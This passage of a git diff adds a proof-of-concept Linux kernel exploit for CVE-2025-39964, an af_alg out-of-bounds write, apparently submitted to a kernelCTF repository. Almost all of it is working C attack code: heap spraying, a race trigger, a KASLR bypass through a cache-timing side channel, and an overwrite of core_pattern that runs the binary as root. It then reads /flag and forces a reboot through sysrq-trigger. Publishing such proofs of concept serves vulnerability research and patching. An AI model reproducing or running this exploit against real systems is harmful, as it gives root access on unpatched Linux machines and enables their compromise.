+ printf("\npvec %p %x\n", pvec, pvec[0]);
+ return (size_t)pvec;
+}
+
+int check_core() {
+ /* Check if /proc/sys/kernel/core_pattern has been overwritten */
+ char core_pattern_buf[0x100] = {};
+ int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
+ read(core, core_pattern_buf, sizeof(core_pattern_buf));
+ close(core);
+ return strncmp(core_pattern_buf, "|/proc/%P/fd/666", 0x10) == 0;
+}
+
+void crash(char *cmd) {
+ int memfd = memfd_create("", 0);
+ /* send our binary to memfd for core_pattern payload */
+ SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
+ /* our binary now at file descriptor 666 */
+ dup2(memfd, 666);
+ close(memfd);
+ while (check_core() == 0)
+ sleep(1);
+ puts("Root shell !!");
+ /* Trigger program crash and cause kernel to execute program from core_pattern
+ * which is our "root" binary */
+ *(size_t *)0 = 0;
+}
+
+size_t bypass_kaslr(u64 base);
+
+int guess_addr(size_t guesss) {
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = guesss;
+ write(cfd[1], buf, 0x100);
+ buf[0] = 'b';
+ int x = send(opfd, buf, 1, MSG_MORE);
+ printf("x: %d\n", x);
+ return x == 1;
+}
+
+int trigger_exploit();
+int main(int argc, char **argv) {
+
+ setvbuf(stdin, 0, 2, 0);
+ setvbuf(stdout, 0, 2, 0);
+ puts("Exploit start");
+ if (argc == 1) {
+ size_t stext = 0;
+ if (getenv("KTEXT"))
+ stext = strtoull(getenv("KTEXT"), 0, 16);
+ else
+ stext = bypass_kaslr(0);
+ /* core_pattern symbol is at a fixed offset from _stext */
+ core_pattern = stext + CORE_PATTERN_COS_OFFSET;
+ printf("got stext 0x%zx 0x%zx\n", stext, core_pattern);
+ }
+
+ struct rlimit rlim = {.rlim_cur = 0xf000, .rlim_max = 0xf000};
+ setrlimit(RLIMIT_NOFILE, &rlim);
+
+ if (argc > 1) {
+#define SYS_pidfd_getfd 438
+ int pid = strtoull(argv[1], 0, 10);
+ int pfd = syscall(SYS_pidfd_open, pid, 0);
+ int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
+ int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
+ int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
+ dup2(stdinfd, 0);
+ dup2(stdoutfd, 1);
+ dup2(stderrfd, 2);
+ /* Run cat /flag multiple times to ensure output is flushed before reboot */
+ for (int i = 0; i < 6; i++)
+ system("cat /flag");
+
+ system("cat /flag;echo o>/proc/sysrq-trigger");
+ execlp("bash", "bash", NULL);
+ }
+ /* Step 7: fork a watcher that polls core_pattern and triggers crash once
+ * overwritten */
+ if (fork() == 0) {
+ set_cpu(0);
+ setsid();
+ crash("");
+ }
+ /* Retry loop: trigger_exploit() may fail the race; restart on failure */
+ while (1) {
+ if (fork() == 0) {
+ trigger_exploit();
+ exit(0);
+ }
+ wait(NULL);
+ }
+}
+
+int trigger_exploit() {
+ int tfmfd;
+
+ set_cpu(1);
+ SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, cfd));
+
+ /* Step 1: spray heap with crafted msg_control buffers */
+ spray_unix_sockets();
+
+ char *addr = SYSCHK(mmap(0, MMAP_REGION_LEN, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANON, -1, 0));
+ struct iovec local = {.iov_base = addr, .iov_len = MMAP_REGION_LEN};
+ struct iovec remote = {.iov_base = addr, .iov_len = MMAP_REGION_LEN};
+
+ struct sockaddr_alg sa = {
+ .salg_family = AF_ALG,
+ .salg_type = "skcipher", /* symmetric key cipher */
+ .salg_name = "cbc(aes)", /* AES in CBC mode */
+ };
+
+ /* Step 2: create and bind the AF_ALG transformation socket */
+ tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0);
+ if (tfmfd == -1) {
+ perror("socket");
+ return 1;
+ }
+
+ if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) != 0) {
+ perror("bind");
+ close(tfmfd);
+ return 1;
+ }
+
+ unsigned char key[32] = {0};
+ if (setsockopt(tfmfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) != 0) {
+ perror("setsockopt");
+ close(tfmfd);
+ return 1;
+ }
+
+ opfd = accept(tfmfd, NULL, 0);
+ if (opfd == -1) {
+ perror("accept");
+ close(tfmfd);
+ return 1;
+ }
+
+ int val = 0x1000;
+
+ struct {
+ struct cmsghdr cmsg;
+ __u32 op;
+ __u32 ivlen;
+ unsigned char iv[16];
+ } __attribute__((__packed__)) msg;
+
+ memset(&msg, 0, sizeof(msg));
+ msg.cmsg.cmsg_level = SOL_ALG;
+ msg.cmsg.cmsg_type = ALG_SET_OP;
+ msg.cmsg.cmsg_len = CMSG_LEN(sizeof(__u32) + sizeof(__u32) + 16);
+
+ msg.op = ALG_OP_ENCRYPT;
+ msg.ivlen = 16;
+ memset(msg.iv, 0x01, 16);
+
+ struct iovec iov = {
+ .iov_base = buf,
+ .iov_len = 0x1000,
+ };
+
+ struct msghdr msgh;
+ memset(&msgh, 0, sizeof(msgh));
+ msgh.msg_iov = &iov;
+ msgh.msg_iovlen = 1;
+ msgh.msg_control = &msg;
+ msgh.msg_controllen = msg.cmsg.cmsg_len;
+
+ /* Step 3: initial sendmsg to initialise the tsgl; advances sgl->cur to 1 */
+ ssize_t n = sendmsg(opfd, &msgh, MSG_MORE);
+ printf("init %ld\n", n);
+
+ /*
+ * Step 3 (cont): advance sgl->cur from 1 to 124 (MAX_SGL_ENTS - 2) using
+ * SGL_MERGE_ITERATIONS = 0x7b send+recv pairs. Each send allocates one sg
+ * entry (cur++); each recv drains the processed entry so the socket stays
+ * writable. The loop comment in the original PR is:
+ * "the loop with 0x7b + the sendmsg and send calls executes 125 times,
+ * matching MAX_SGL_ENTS - 1 = 126 - 1 = 125."
+ */
+ for (int i = 0; i < SGL_MERGE_ITERATIONS; i++) {
+ SYSCHK(send(opfd, buf, 0x1000, MSG_MORE));
+ n = recv(opfd, buf, 0x1000, 0);
+ }
+
+ /* Advance sgl->cur to 125 = MAX_SGL_ENTS - 1 (one slot before the list is
+ * full) */
+ send(opfd, buf, 0x1000, MSG_MORE);
+ SYSCHK(setsockopt(opfd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val)));
+ printf("setsockopt done\n");
+
+ /*
+ * Step 3 (race): fork two children that race each other:
+ *
+ * Child A (send invalid addr): passes INVALID_USER_ADDR, which causes
+ * af_alg_alloc_tsgl() to allocate a new tsgl (sgl->cur → 0) then fail
+ * in memcpy_from_msg() — leaving ctx->merge = 1 and sgl->cur = 0.
+ *
+ * Child B (send 0x200 bytes): sends a sub-page-size buffer so that
+ * ctx->merge is set to 1 and sgl->cur advances to MAX_SGL_ENTS = 126.
+ *
+ * Desired outcome: both children finish such that ctx->merge == 1 AND the
+ * last tsgl has sgl->cur == 0. The next send() will then use sg[-1].
+ */
+ if (fork() == 0) {
+ /* Child A: trigger new-tsgl allocation then fail — sets sgl->cur = 0 */
+ int x = send(opfd, INVALID_USER_ADDR, 0x400, MSG_MORE);
+ printf("send3 %d\n", x);
+ exit(0);
+ }
+
+ if (fork() == 0) {
+ /* Child B: sub-page send sets ctx->merge = 1 and fills sgl->cur to
+ * MAX_SGL_ENTS */
+ int x = send(opfd, buf, 0x200, MSG_MORE);
+ printf("send2 %d\n", x);
+ exit(0);
+ }
+
+ /*
+ * @sleep(desc="wait for both fork children to reach their send() calls and
+ * set ctx->merge=1 with sgl->cur=0 before we recv()")
+ */
+ sleep(1);
+ n = recv(opfd, buf, 0x1000, 0);
+ printf("recv2 %ld\n", n);
+ wait(NULL);
+
+ /* Step 4: release spray threads so they re-send their crafted payloads */
+ for (int i = 0; i < THREAD_NUM; i++) {
+ write(cfd[1], buf, 1);
+ }
+
+ n = recv(opfd, buf, 0x1000, 0);
+ printf("recv2 %ld\n", n);
+
+ memset(buf, 'z', 0x1000);
+ wait(NULL);
+
+ /* Step 5: map userspace oracle region for the binary search */
+ allocate_map();
+
+ /* Step 5 (OOB trigger): with ctx->merge=1 and sgl->cur=0 this send uses
+ * sg[-1].page_link from our sprayed payload — triggering the OOB write.
+ * Returns -1 if the write destination is unmapped (race failed); 1 if mapped.
+ */
+ int x = send(opfd, buf, 1, MSG_MORE);
+
+ if (x == 1) {
+ puts("Race fail");
+ exit(0);
+ }
+
+ /*
+ * Step 5 (binary search oracle):
+ *
+ * Background:
+ * sg[-1].page_link is effectively a pointer to a struct page in vmemmap.
+ * The kernel computes the write destination as:
+ * dest = page_address(sg_page(sg)) + sg->offset + sg->length
+ * = page_offset_base + (page_link - vmemmap_base) / 64 * PAGE_SIZE
+ * + offset + length
+ * With page_link ≈ 0, the pfn arithmetic wraps to a very large value, and
+ * (page_offset_base + pfn * PAGE_SIZE) wraps further to land within our
+ * userspace oracle region [SCAN_START_ADDR, SCAN_END_ADDR).
+ *
+ * Oracle:
+ * send() returns 1 → the write destination is in a mapped page (success).
+ * send() returns -1 → the destination is unmapped (copy_from_user failed).
+ * By progressively munmap-ing halves of the oracle region we can determine
+ * which physical page corresponds to the OOB write target.
+ *
+ * Binary search (8 iterations → narrows range from SCAN_END_ADDR to ~340 MB):
+ * Each iteration j tests: "if I decrease page_link by half_range/64, does
+ * the write still succeed?"
+ * - Decreasing page_link by Δ shifts dest by Δ*64 bytes (since each
+ * struct-page unit = 64 bytes = one PAGE_SIZE/64 step in physmap).
+ * - The test delta (SCAN_END_ADDR >> (7+j)) in page_link units equals
+ * half_range = (SCAN_END_ADDR >> (1+j)) in dest-address units.
+ * If the shifted oracle still succeeds → dest is in the *upper* half →
+ * unmap the lower half and advance start.
+ * Otherwise → dest is in the *lower* half → unmap the upper half.
+ */
+ size_t oracle;
+ size_t leak_offset = 0;
+ int xcnt = 0;
+ for (int k = 0; k < MAX_SCAN_ITERATIONS; k++) {
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] -= (SCAN_END_ADDR >> 6);
+ write(cfd[1], buf, 0x100);
+ buf[0] = 'a';
+ x = send(opfd, buf, 1, MSG_MORE);
+ if (x == 1) {
+ puts("");
+ xcnt++;
+ oracle = *(size_t *)&payload[PAYLOAD_OFFS_TARGET];
+ char *start = (void *)(0ULL);
+ for (int j = 0; j < 8; j++) {
+ printf("loop j: %d\n", j);
+ x = guess_addr(oracle - (SCAN_END_ADDR >> (7 + j)));
+ if (x == 1) {
+ xcnt++;
+ start += (SCAN_END_ADDR >> (1 + j)); /* upper half */
+ munmap(start - (SCAN_END_ADDR >> (1 + j)),
+ (SCAN_END_ADDR >> (1 + j)));
+ } else {
+ munmap(start + (SCAN_END_ADDR >> (1 + j)),
+ (SCAN_END_ADDR >> (1 + j)));
+ }
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle;
+ /* search_offset returns the exact userspace VA of the OOB-written page */
+ leak_offset = search_offset(start) + xcnt;
+ printf("leak_offset %zx\n", leak_offset);
+ printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]);
+
+ break;
+ }
+ }
+
+ if (leak_offset == 0)
+ exit(0);
+
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle;
+ write(cfd[1], buf, 0x100);
+
+ /*
+ * Step 6: redirect the OOB write to core_pattern.
+ *
+ * leak_offset is the VA of the currently-targeted physical page.
+ * core_pattern is the KASLR-adjusted kernel VA of core_pattern[].
+ *
+ * First, align within-page: send adjust_offset bytes so that after the
+ * advance the write starts at the same within-page offset as core_pattern.
+ */
+ size_t adjust_offset =
+ PAGE_SIZE + (core_pattern & PAGE_MASK) - (leak_offset & PAGE_MASK);
+ leak_offset += adjust_offset;
+
+ memset(buf, 'z', 0x1000);
+ SYSCHK(send(opfd, buf, adjust_offset - 1, MSG_MORE));
+ SYSCHK(send(opfd, buf, 1, MSG_MORE));
+
+ printf("sg->len overflow check %x\n", *(char *)(leak_offset - 1));
+ if (*(char *)(leak_offset - 1) != 'z')
+ leak_offset -= 0x100000000ULL;
+
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+
+ /*
+ * Now adjust payload[PAYLOAD_OFFS_TARGET] (= sg[-1].page_link) so that
+ * page_address(sg_page(sg)) points to the physical page holding core_pattern.
+ * The >> 6 (or / 64) is actually a simplification of the formula
+ * (addr / 0x1000) * 64. We divide the address by 0x1000 to find the page
+ * index, and then multiply by 64 because each memory page has a page_struct
+ * that is exactly 64 bytes long.
+ * payload[PAYLOAD_OFFS_TARGET] is sg[-1].page_link, which controls dest via
+ * the formula described in the binary search comment above.
+ */
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] +=
+ (((core_pattern & ~PAGE_MASK) - (leak_offset & ~PAGE_MASK)) >> 6);
+ printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]);
+ write(cfd[1], buf, 0x100);
+ /* Step 6 (write): send the core_pattern string; kernel copies it to
+ * core_pattern[] */
+ char mcore[64] = "|/proc/%P/fd/666 %P";
+ SYSCHK(send(opfd, mcore, 64, MSG_MORE));
+ PAUSE;
+
+ return 0;
+}
+
+inline __attribute__((always_inline)) uint64_t rdtsc_begin() {
+ uint64_t a, d;
+ asm volatile("mfence\n\t"
+ "RDTSCP\n\t"
+ "mov %%rdx, %0\n\t"
+ "mov %%rax, %1\n\t"
+ "xor %%rax, %%rax\n\t"
+ "lfence\n\t"
+ : "=r"(d), "=r"(a)
+ :
+ : "%rax", "%rbx", "%rcx", "%rdx");
+ a = (d << 32) | a;
+ return a;
+}
+
+inline __attribute__((always_inline)) uint64_t rdtsc_end() {
+ uint64_t a, d;
+ asm volatile("xor %%rax, %%rax\n\t"
+ "lfence\n\t"
+ "RDTSCP\n\t"
+ "mov %%rdx, %0\n\t"
+ "mov %%rax, %1\n\t"
+ "mfence\n\t"
+ : "=r"(d), "=r"(a)
+ :
+ : "%rax", "%rbx", "%rcx", "%rdx");
+ a = (d << 32) | a;
+ return a;
+}
+
+void prefetch(void *p) {
+ asm volatile("prefetchnta (%0)\n"
+ "prefetcht2 (%0)\n"
+ :
+ : "r"(p));
+}
+
+size_t flushandreload(void *addr) /* row miss */
+{
+ size_t time = rdtsc_begin();
+ prefetch(addr);
+ size_t delta = rdtsc_end() - time;
+ return delta;
+}
+
+/*
+ * KASLR bypass via Flush+Reload side channel.
+ *
+ * Uncomment KASLR_BYPASS_INTEL for Intel CPUs (kernelCTF remote instances).
+ * Keep commented for GitHub CI (AMD/other) to use the sliding-window variant.
+ * Alternatively pass -DKASLR_BYPASS_INTEL to the compiler without touching
+ * source.
+ */
+// #define KASLR_BYPASS_INTEL
+size_t bypass_kaslr(u64 base) {
+ if (!base) {
+#ifdef KASLR_BYPASS_INTEL
+#define OFFSET 0
+#define START (0xffffffff81000000ull + OFFSET)
+#define END (0xffffffffD0000000ull + OFFSET)
+#define STEP 0x0000000001000000ull
+ while (1) {
+ u64 bases[7] = {0};
+ for (int vote = 0; vote < ARRAY_LEN(bases); vote++) {
+ size_t times[(END - START) / STEP] = {};
+ uint64_t addrs[(END - START) / STEP];
+
+ for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+ times[ti] = ~0;
+ addrs[ti] = START + STEP * (u64)ti;
+ }
+
+ for (int i = 0; i < 16; i++) {
+ for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+ u64 addr = addrs[ti];
+ size_t t = flushandreload((void *)addr);
+ if (t < times[ti]) {
+ times[ti] = t;
+ }
+ }
+ }
+
+ size_t minv = ~0;
+ size_t mini = -1;
+ for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) {
+ if (times[ti] < minv) {
+ mini = ti;
+ minv = times[ti];
+ }
+ }
+
+ if (mini < 0) {
+ return -1;
+ }
+
+ bases[vote] = addrs[mini];
+ }
+
+ int c = 0;
+ for (int i = 0; i < ARRAY_LEN(bases); i++) {
+ if (c == 0) {
+ base = bases[i];
+ } else if (base == bases[i]) {
+ c++;
+ } else {
+ c--;
+ }
+ }
+
+ c = 0;
+ for (int i = 0; i < ARRAY_LEN(bases); i++) {
+ if (base == bases[i]) {
+ c++;
+ }
+ }
+ if (c > ARRAY_LEN(bases) / 2) {
+ base -= OFFSET;
+ goto got_base;
+ }
+
+ printf("majority vote failed:\n");
+ printf("base = %llx with %d votes\n", base, c);
+ }
+#else
+#define START (0xffffffff81000000ull)
+#define END (0xffffffffc0000000ull)
+#define STEP 0x0000000000200000ull
+#define NUM_TRIALS 9
+/* largest contiguous mapped area at the beginning of _stext */
+#define WINDOW_SIZE 11
+
+ while (1) {
+ u64 bases[NUM_TRIALS] = {0};
+
+ for (int vote = 0; vote < ARRAY_LEN(bases); vote++) {
+ size_t times[(END - START) / STEP] = {};
+ uint64_t addrs[(END - START) / STEP];
+
+ for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+ times[ti] = ~0;
+ addrs[ti] = START + STEP * (u64)ti;
+ }
+
+ for (int i = 0; i < 16; i++) {
+ for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+ u64 addr = addrs[ti];
+ size_t t = flushandreload((void *)addr);
+ if (t < times[ti]) {
+ times[ti] = t;
+ }
+ }
+ }
+
+ uint64_t max = 0;
+ int max_i = 0;
+ for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) {
+ uint64_t sum = 0;
+ for (int i = 0; i < WINDOW_SIZE; i++) {
+ sum += times[ti + i];
+ }
+ if (sum > max) {
+ max = sum;
+ max_i = ti;
+ }
+ }
+
+ bases[vote] = addrs[max_i];
+ }
+
+ int c = 0;
+ for (int i = 0; i < ARRAY_LEN(bases); i++) {
+ if (c == 0) {
+ base = bases[i];
+ } else if (base == bases[i]) {
+ c++;
+ } else {
+ c--;
+ }
+ }
+
+ c = 0;
+ for (int i = 0; i < ARRAY_LEN(bases); i++) {
+ if (base == bases[i]) {
+ c++;
+ }
+ }
+ if (c > ARRAY_LEN(bases) / 2) {
+ goto got_base;
+ }
+
+ printf("majority vote failed:\n");
+ printf("base = %llx with %d votes\n", base, c);
+ }
+#endif
+ }
+
+got_base:
+
+ printf("using kernel base %llx\n", base);
+
+ return base;
+}
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/Makefile b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/Makefile
new file mode 100644
index 000000000..3eabaca61
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/Makefile
@@ -0,0 +1,5 @@
+all: exploit
+
+exploit: exploit.c
+ gcc -static-pie -o exploit exploit.c
+
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit
new file mode 100755
index 000000000..16c519ca2
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit differ
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit.c b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit.c
new file mode 100644
index 000000000..837b3b79a
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit.c
@@ -0,0 +1,899 @@
+/*
+ * Exploit for CVE-2025-39964 — Linux af_alg out-of-bounds write (LTS 6.12.44)
+ *
+ * Vulnerability: af_alg_sendmsg() has a race condition allowing two concurrent
+ * sendmsg calls to produce ctx->merge=1 with sgl->cur=0 simultaneously.
+ * In this state the merge branch computes sg = sgl->sg + sgl->cur - 1 = sg[-1],
+ * which is an out-of-bounds read into the previous heap chunk. The
+ * sg[-1].page_link value from the previous chunk controls the destination of
+ * memcpy_from_msg(), giving an arbitrary kernel write primitive.
+ *
+ * Exploit chain (LTS 6.12.44):
+ * 1. Spray 0x100 AF_UNIX socket pairs; each thread sends a crafted msghdr
+ * whose msg_control (payload[]) lands in the heap slot just before an
+ * af_alg_tsgl. payload[PAYLOAD_OFFS_TARGET] controls sg[-1].page_link = write
+ * destination.
+ * 2. Set up an AF_ALG socket (AES-CBC); advance sgl->cur to MAX_SGL_ENTS-1 =
+ * 125 using 1 sendmsg + SGL_MERGE_ITERATIONS send/recv pairs + 1 more send.
+ * 3. Fork two children that race: one sets ctx->merge=1
+ * (sgl->cur→MAX_SGL_ENTS), the other allocates a new sgl (sgl->cur→0) via an
+ * invalid userspace pointer.
+ * 4. With ctx->merge=1 and sgl->cur=0, the next sendmsg triggers the OOB write
+ * to the address derived from payload[PAYLOAD_OFFS_TARGET].
+ * 5. Map [SCAN_START_ADDR, SCAN_END_ADDR) in MAP_CHUNK_SIZE (2 GB) chunks so
+ * the OOB write destination (which wraps into userspace due to page_link
+ * arithmetic) falls in a mapped region. An 8-step binary search (oracle =
+ * send() return value) narrows the target to a ~340 MB window; mincore then
+ * locates the exact page.
+ * 6. Adjust the write destination via page_link arithmetic to point to the
+ * core_pattern kernel symbol, then write "|/proc/%P/fd/666 %P".
+ * 7. A forked child watches for core_pattern to change, then faults (NULL
+ * deref), causing the kernel to execute our binary as root via core_pattern.
+ * 8. Re-exec reads /flag via pidfd_getfd() on the parent's stdio descriptors.
+ */
+
+#define _GNU_SOURCE
+#include <err.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <sched.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/resource.h>
+#include <sys/sendfile.h>
+#include <sys/socket.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#ifndef SYS_pidfd_getfd
+#define SYS_pidfd_getfd 438
+#endif
+
+#ifndef SYS_pidfd_open
+#define SYS_pidfd_open 434
+#endif
+
+size_t vmemmap_base = 0xffffea0000000000ULL;
+size_t page_offset_base = 0xffff888000000000ULL;
+size_t core_pattern = 0xffffffff8420d520ULL;
+
+/* Socket options */
+#define ALG_SET_KEY 1
+#define ALG_SET_IV 2
+#define ALG_SET_OP 3
+#define ALG_SET_AEAD_ASSOCLEN 4
+#define ALG_SET_AEAD_AUTHSIZE 5
+#define ALG_SET_DRBG_ENTROPY 6
+#define ALG_SET_KEY_BY_KEY_SERIAL 7
+
+/* Operations */
+#define ALG_OP_DECRYPT 0
+#define ALG_OP_ENCRYPT 1
+
+typedef unsigned char u8;
+typedef unsigned short u16;
+typedef unsigned int u32;
+typedef unsigned long long u64;
+typedef char i8;
+typedef short i16;
+typedef int i32;
+typedef long long i64;
+#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))
+
+#define __u32 uint32_t
+#define __u16 uint16_t
+#define __u8 uint8_t
+#define PAUSE \
+ { \
+ int x; \
+ printf(":"); \
+ read(0, &x, 1); \
+ }
+
+#define SYSCHK(x) \
+ ({ \
+ typeof(x) __res = (x); \
+ if (__res == (typeof(x))-1) \
+ err(1, "SYSCHK(" #x ")"); \
+ __res; \
+ })
+
+#ifndef SYS_process_vm_readv
+#define SYS_process_vm_readv 310
+#endif
+
+/* Number of AF_UNIX pairs to spray; one pair per exploit thread */
+#define THREAD_NUM 0x100
+
+/*
+ * Size of each private anonymous mapping used as the OOB write oracle region:
+ * 512 PTEs per page * PAGE_SIZE = 2 MB physical coverage per mmap entry.
+ */
+#define MMAP_REGION_LEN (0x1000 / 8 * 0x1000)
+
+/*
+ * Start of the contiguous userspace region we map for the binary-search oracle.
+ * We start just above the 4 GB boundary to avoid the low userspace region.
+ */
+#define SCAN_START_ADDR 0x100000000ULL
+
+/* Maximum number of mincore windows tried during the page-address scan */
+#define MAX_SCAN_ITERATIONS 0x50
+
+/*
+ * Unmapped address passed as invalid user pointer to trigger the race
+ * condition: the first 4 MB of virtual address space (0–0xfff000) is always
+ * unmapped.
+ */
+#define INVALID_USER_ADDR ((void *)0xfff000)
+
+/*
+ * Byte offset of sg[-1].page_link inside the sprayed msg_control payload:
+ * af_alg_tsgl is allocated in a 4096-byte slab object.
+ * sgl->sg[0] starts at byte 24 (sizeof(af_alg_tsgl)).
+ * sg[-1] = sgl->sg[-1] lies 32 bytes (sizeof(scatterlist)) before sg[0],
+ * i.e. at byte 24 - 32 = -8 relative to the tsgl object start.
+ * In the *previous* 4096-byte heap object that is offset 4096 - 8 = 0xff8.
+ * scatterlist.page_link is the first field (offset 0), so payload[0xff8]
+ * directly controls the page_link that the OOB write uses as its destination.
+ */
+#define PAYLOAD_OFFS_TARGET 0xff8
+
+/*
+ * Number of send/recv iterations to advance sgl->cur from 1 to 124
+ * (MAX_SGL_ENTS-2). MAX_SGL_ENTS = (4096 - sizeof(af_alg_tsgl)) /
+ * sizeof(scatterlist) - 1 = (4096 - 24) / 32 - 1 = 126. One initial sendmsg
+ * sets cur=1; SGL_MERGE_ITERATIONS send+recv pairs bring it to 1 + 0x7b = 124;
+ * one more send brings it to 125 = MAX_SGL_ENTS - 1.
+ */
+#define SGL_MERGE_ITERATIONS 0x7b
+
+/* Compile-time unslid base of kernel text (_stext); used when computing symbol
+ * offsets */
+#define KERNEL_TEXT_BASE 0xffffffff81000000UL
+
+/*
+ * KASLR-invariant offset of core_pattern from _stext in LTS 6.12.44.
+ * core_pattern is at 0xffffffff8420e260; _stext is at KERNEL_TEXT_BASE.
+ */
+#define CORE_PATTERN_LTS_OFFSET (0xffffffff8420e260UL - KERNEL_TEXT_BASE)
+
+/* Upper bound of the userspace oracle scan region [SCAN_START_ADDR,
+ * SCAN_END_ADDR) */
+#define SCAN_END_ADDR 0x500000000000ULL
+
+/* Size of each anonymous 2 GB mmap chunk used to cover the oracle region */
+#define MAP_CHUNK_SIZE 0x80000000ULL
+
+#ifndef PAGE_SIZE
+#define PAGE_SIZE 0x1000
+#endif
+/* Page offset mask for within-page alignment (PAGE_SIZE - 1) */
+#define PAGE_MASK (PAGE_SIZE - 1)
+
+pthread_t tid[THREAD_NUM];
+
+/* Shared scratch buffer used by spray threads and the main exploit loop */
+char buf[0x10000];
+char vec[0x100000];
+
+int cfd[2];
+int sfd[THREAD_NUM][2];
+char payload[0x1000];
+int opfd;
+
+struct sockaddr_alg {
+ __u16 salg_family;
+ __u8 salg_type[14];
+ __u32 salg_feat;
+ __u32 salg_mask;
+ __u8 salg_name[64];
+};
+
+void set_cpu(int i) {
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(i, &mask);
+ sched_setaffinity(0, sizeof(mask), &mask);
+}
+
+void *spray_send_thread(void *x) {
+ size_t idx = (size_t)x;
+ write(cfd[0], buf, 1);
+ read(cfd[0], buf, 1);
+ struct iovec iov = {buf, 0x1000};
+ struct msghdr mhdr = {.msg_iov = &iov,
+ .msg_iovlen = 1,
+ .msg_control = payload,
+ .msg_controllen = 0x1000};
+ while (1) {
+ sendmsg(sfd[idx][1], &mhdr, 0);
+ write(cfd[0], buf, 1);
+ read(cfd[0], buf, 1);
+ }
+}
+
+/*
+ * Step 1: Spray THREAD_NUM AF_UNIX socket pairs, each sending a crafted msghdr
+ * whose msg_control buffer (payload[]) will occupy the heap slot immediately
+ * preceding an af_alg_tsgl allocation. payload[PAYLOAD_OFFS_TARGET] then
+ * aliases sg[-1].page_link and controls the OOB write destination.
+ */
+void spray_unix_sockets() {
+ memset(payload, 'a', 0x1000);
+ struct cmsghdr *first;
+ first = (struct cmsghdr *)payload;
+ first->cmsg_len = 0x1000;
+ first->cmsg_level =
+ 0; /* must differ from SOL_SOCKET=1 to skip cmsg processing */
+ first->cmsg_type = 0x41414141; /* dummy filler value */
+ /* Initially zero; the binary search will update this to guide the OOB write
+ */
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = 0;
+
+ for (int i = 0; i < THREAD_NUM; i++) {
+ SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd[i]));
+ int n = 0x800;
+ setsockopt(sfd[i][1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n));
+ setsockopt(sfd[i][0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n));
+ write(sfd[i][1], buf, 0x1000);
+ }
+
+ for (int i = 0; i < THREAD_NUM; i++)
+ pthread_create(&tid[i], 0, spray_send_thread, (void *)(size_t)i);
+
+ for (int i = 0; i < THREAD_NUM; i++)
+ read(cfd[1], buf, 1);
+}
+
+/*
+ * Step 5a: Map the full userspace range [SCAN_START_ADDR, SCAN_END_ADDR) with
+ * physical pages in MAP_CHUNK_SIZE (2 GB) chunks. When sg[-1].page_link is
+ * crafted with a value near 0, the kernel's page_address() computation wraps
+ * around and the OOB write destination lands somewhere within this region.
+ * Mapping real pages here means the write silently succeeds (our oracle),
+ * letting us binary-search for the exact physical page by progressively
+ * munmap-ing halves of this range.
+ */
+void allocate_map() {
+ char *start = (void *)SCAN_START_ADDR;
+ while (1) {
+ start = SYSCHK(mmap(start, MAP_CHUNK_SIZE, PROT_READ | PROT_WRITE,
+ MAP_SHARED | MAP_ANON | MAP_FIXED, -1, 0));
+ start += MAP_CHUNK_SIZE;
+ if ((size_t)start >= SCAN_END_ADDR)
+ break;
+ }
+}
